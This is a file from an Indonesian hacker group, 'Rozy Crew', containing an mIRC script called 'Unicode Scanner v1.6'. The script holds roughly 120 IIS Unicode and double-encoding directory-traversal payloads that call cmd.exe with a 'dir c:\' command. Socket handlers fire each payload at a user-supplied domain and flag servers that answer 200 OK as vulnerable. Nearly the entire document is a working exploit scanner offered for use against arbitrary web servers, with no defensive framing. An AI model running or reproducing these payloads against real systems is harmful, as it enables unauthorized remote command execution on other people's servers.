Artikel From Rozy Crew

=================================================================================================
Jika Anda Ingin Berbagi Ilmu
Tentang Ilmu Komputer
Tolong Kirimkan Tips dan Trik atau Artikel Anda
Ke Rozy@hehe.com atau Rozy_eksa@yahoo.com 
VER Bahasa Indonesia
=================================================================================================

----------------------------------------Unicode Scanner v1.6 set %unicode1 /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode2 /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode3 /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\ set %unicode4 /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\ set %unicode5 /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode6 /_vti_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode7 /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode8 /_vti_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode9 /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode10 /_vti_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode11 /_vti_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode12 /_vti_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode13 /_vti_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode14 /_vti_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode15 /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode16 /_vti_bin/..%252e../..%252e../..%252e../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode17 /_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode18 /_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode19 /_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode20 /_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode21/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode22 /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+ set %unicode23 /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c\ set %unicode24 /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c\ set %unicode25 /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode26 /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c\ set %unicode27 /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c\ set %unicode28 /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c\ set %unicode29 /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode30 /cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode31 /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode32 /cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode34 /cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode35 /cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode36 /cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode37 /cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode38 /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode39 /cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode40 /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ set %unicode41 /cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode42 /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode43 /cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode44 /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode45 /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode46 /cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode47 /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode48 /cgi-bin/..%252e../..%252e../..%252e../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode49 /cgi-bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode50 /cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode51 /cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode52 /cgi-bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode53 /cgi-bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode54 /cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode55 /cgi-bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode56 /cgi-bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode57 /cgi-bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode58 /cgi-bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode59 /cgi-bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set unicode60 /cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode61 /cgi-bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode62 /cgi-bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode63 /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode64 /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\ set %unicode65 /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode66 /msadc/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode67 /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode68 /msadc/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode69 /msadc/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode70 /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode71 /msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode72 /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode73 /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode74 /msadc/..%252e../..%252e../..%252e../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode75 /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode76 /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode77 /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode78 /msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode79 /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ set %unicode80 /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode81 /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode82 /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode83 /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode84 /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode85 /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode86 /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode87 /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode88 /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode89 /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ set %unicode90 /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode91 /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode92 /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode93 /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode94 /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode95 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode96 /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode97 /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode98 /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode99 /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode100 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode101 /_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode102 /_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode103 /_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode104 /_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode105 /News/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode106 /News/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode107 /News/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dior+c:\ set %unicode108 /_vti_adm/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode109 /_vti_adm/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode110 /_vti_adm/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode111 /_vti_adm/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode112 /_vti_aut/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode113 /_vti_aut/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode114 /_vti_aut/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode115 /_vti_aut/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ set %unicode116 /scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ set %unicode117 /scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\ set %unicode118 /scripts/..%bg%af../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode119 /scripts/..%bg%9v../winnt/system32/cmd.exe?/c+dir+c:\ set %unicode120 /scripts/..%bg%qf../winnt/system32/cmd.exe?/c+dir+c:\ set %ScannerStatus OFF } #ScanUnicode off on *:SOCKOPEN:URL-Unicode*: { window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- @Try unicode type %UnicodeCount ( $read -l1 Unicode-Scanner.txt ). sockwrite -n $sockname GET $read -l1 Unicode-Scanner.txt HTTP/1.1 sockwrite -n $sockname Host: %URL-Unicode sockwrite -n $sockname Connection: keep-alive sockwrite $sockname $crlf } on *:SOCKCLOSE:URL-Unicode*: { inc %UnicodeCount write -c Unicode-Scanner.txt %Unicode [ $+ [ %UnicodeCount ] ] if (%UnicodeCount <= 45) { /.timerSock 1 1 SockOpen URL-Unicode %URL-Unicode 80 } if (%UnicodeCount == 46) { window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- 7S12canner:1 ( $+ %URL-Unicode $+ ) closed. | /.disable #ScanUnicode } } on *:SOCKREAD:URL-Unicode*: { sockread %Temp-Unicode if (HTTP/1.1 200 OK isin %Temp-Unicode) { window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- ***7H12as been detected as vulnerable unicode to the URL (check your Status Window). 4ö | echo -s 7U12RL: 1http:// $+ %URL-Unicode $+ $read -l1 Unicode-Scanner.txt } | elseif (HTTP/1.0 500 Server Error isin %Temp-Unicode || HTTP/1.1 403 Access Forbidden isin %Temp-Unicode || HTTP/1.1 404 Object Not Found isin %Temp-Unicode || HTTP/1.1 500 Server Error isin %Temp-Unicode) { window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- ***7N12ot vulnerable to the unicode exploit. } } #ScanUnicode end #ScanURL off on *:SOCKOPEN:URL*: { window -l @URL-Scanner | aline -c @URL-Scanner $1- 7S12canner:1 $sockname ( $+ $sock($sockname).ip or %URL-Scan $+ ) opened. sockwrite -n $sockname GET / HTTP/1.1 sockwrite -n $sockname Host: %URL-Scan sockwrite -n $sockname Connection: keep-alive sockwrite $sockname $crlf } on *:SOCKCLOSE:URL*: /window -l @URL-Scanner | aline -c @URL-Scanner $1- 7S12canner:1 $sockname ( $+ $sock($sockname).ip or %URL-Scan $+ ) closed. | /.disable #ScanURL on *:SOCKREAD:URL*: { sockread %temp if (%temp) { /window -l @URL-Scanner | /aline -c @URL-Scanner $1- %temp } } #ScanURL end ;-------- - - ; Popups ;-------- - - menu menubar { Scanner .URL Header:/.enable #ScanURL | /set %URL-Scan $$?="domain.com or www.domain.com (without http://)" | /SockOpen URL %URL-Scan 80 .- .Scan Unicode [[ $+ %ScannerStatus $+ ]]:if (%ScannerStatus == OFF) { /set %ScannerStatus ON | /.enable #ScanUnicode | /set %UnicodeCount 1 | write -c Unicode-Scanner.txt %Unicode [ $+ [ %UnicodeCount ] ] | /set %URL-Unicode $$?="domain.com or www.domain.com (without http://)" | /window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- 7S12canner:1 $sockname ( $+ %URL-Unicode $+ ) opened. | /SockOpen URL-Unicode %URL-Unicode 80 } | elseif (%ScannerStatus == ON) { /set %ScannerStatus OFF | /.disable #ScanUnicode | /window -l @Unicode-Scanner | aline -c @Unicode-Scanner $1- 7S12canner:1 ( $+ %URL-Unicode $+ ) closed. }